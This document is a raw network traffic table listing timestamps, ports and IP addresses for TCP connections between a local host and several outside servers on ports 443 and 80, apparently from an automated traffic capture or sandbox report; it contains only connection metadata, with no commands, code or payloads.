Apr 4, 2024 17:49:21.333178997 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.333194971 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.333956003 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.333961010 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.334146976 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.336965084 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.336983919 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.337055922 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.337055922 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.337061882 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.337383986 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.340106010 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.340122938 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.340193987 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.340193987 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.340198994 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.340482950 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.343158007 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.343177080 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.343230009 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.343234062 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.343269110 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.343269110 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.346931934 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.346951008 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.347105026 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.347110987 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.347176075 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.350092888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.350111008 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.350275040 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.350281954 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.350405931 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.355794907 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.355813026 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.355906963 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.355914116 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.356082916 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.359518051 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.359543085 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.359630108 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.359636068 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.359708071 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.361752033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.361773968 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.361876011 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.361881018 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.361958981 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.365609884 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.365627050 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.365746021 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.365752935 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.365822077 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.368587971 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.368606091 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.368673086 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.368678093 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.368745089 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.371645927 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.371664047 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.371728897 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.371735096 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.371778965 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.374470949 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.374490023 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.374566078 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.374572039 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.374594927 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.378060102 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.378130913 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.378146887 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.378225088 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.378231049 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.378421068 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.381911039 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.381927967 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.382028103 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.382034063 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.382111073 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.385571957 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.385587931 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.385670900 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.385680914 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.385694981 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.385742903 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.388447046 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.388464928 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.388500929 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.388506889 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.388545990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.388545990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.391155005 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.391184092 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.391241074 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.391247988 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.391319990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.395631075 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.395653009 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.395704031 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.395709991 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.395777941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.397747993 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.397764921 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.397870064 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.397876978 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.397960901 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.400491953 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.400509119 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.400592089 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.400592089 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.400599003 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.402097940 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.403980017 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.403995037 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.404081106 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.404087067 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.404145002 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.406603098 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.406620026 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.406768084 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.406774998 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.406830072 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.409049034 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.409066916 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.409132957 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.409132957 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.409138918 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.410008907 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.412305117 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.412326097 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.412416935 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.412422895 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.412497997 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.415016890 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.415034056 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.415116072 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.415122032 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.415230989 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.417239904 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.417256117 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.417359114 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.417363882 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.417412043 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.419595957 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.419612885 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.419691086 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.419697046 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.419799089 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.422863960 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.422883034 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.422954082 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.422960043 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.423008919 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.423054934 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.425415039 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.425435066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.425496101 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.425501108 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.425544024 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.427934885 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.427952051 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.428019047 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.428019047 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.428025961 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.428878069 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.431675911 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.431704044 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.431765079 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.431770086 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.431782961 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.432776928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.434104919 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.434123993 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.434194088 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.434194088 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.434200048 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.436630011 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.436655045 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.436722994 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.436722994 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.436728954 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.437799931 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.439424038 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.439441919 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.439507008 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.439512968 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.439542055 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.439548016 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.442243099 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.442265987 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.442363024 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.442363024 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.442369938 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.444756985 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.444777966 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.444823027 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.444828033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.444859028 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.444885015 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.447108984 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.447127104 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.447201014 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.447206020 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.447247028 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.449800014 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.449817896 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.449853897 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.449887991 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.449893951 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.449906111 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.449923992 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.449944973 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.449965954 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.460486889 CEST	80	49768	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.462040901 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.462222099 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.462244034 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.464011908 CEST	80	49766	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.505575895 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:21.505688906 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:21.505775928 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:21.520755053 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.520773888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.522739887 CEST	49767	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:21.522759914 CEST	443	49767	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:21.628043890 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.628094912 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.628175974 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.628384113 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.628396988 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.741024017 CEST	80	49768	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.755738020 CEST	80	49768	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.755773067 CEST	80	49768	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.755845070 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.765451908 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.775044918 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.043930054 CEST	80	49768	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.058489084 CEST	80	49770	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.058576107 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.058744907 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.058767080 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.157557964 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.157684088 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.158310890 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.158318043 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.163242102 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.163249969 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.163297892 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.163302898 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.187896013 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.187954903 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.188030958 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.188334942 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.188354015 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.342246056 CEST	80	49770	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.357259989 CEST	80	49770	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.360311985 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.360387087 CEST	49770	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.364072084 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.464924097 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.464992046 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.466218948 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.466239929 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.466640949 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.469141960 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.470001936 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.470047951 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.470139027 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.470177889 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.470356941 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.470439911 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.472285032 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.472316980 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.472503901 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.472536087 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.472856045 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.472882986 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.472898006 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.473041058 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.473067045 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.520235062 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.520510912 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.520559072 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.520580053 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.568232059 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.568437099 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.568483114 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.568512917 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.612252951 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.612349987 CEST	49771	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:22.643918991 CEST	80	49770	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.644278049 CEST	80	49772	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.644383907 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.644556046 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.644567013 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.656239986 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.740721941 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.740772963 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.740845919 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.741120100 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:22.741134882 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:22.844491005 CEST	443	49771	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:22.924839020 CEST	80	49772	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.938536882 CEST	80	49772	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.938566923 CEST	80	49772	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:22.938647985 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:22.938808918 CEST	49772	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:23.070843935 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.070872068 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.070923090 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.070924044 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.070938110 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.070967913 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.071003914 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.071353912 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.071371078 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.071842909 CEST	49769	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.071854115 CEST	443	49769	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.222455978 CEST	80	49772	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:23.281017065 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.284142971 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.284670115 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.284677982 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.286355019 CEST	49773	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:23.286362886 CEST	443	49773	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:23.333034039 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.333110094 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.335427046 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.335450888 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.335706949 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.341485023 CEST	49774	443	192.168.2.10	162.159.133.233
Apr 4, 2024 17:49:23.388230085 CEST	443	49774	162.159.133.233	192.168.2.10
Apr 4, 2024 17:49:23.626568079 CEST	443	49774	162.159.133.233	192.168.2.10
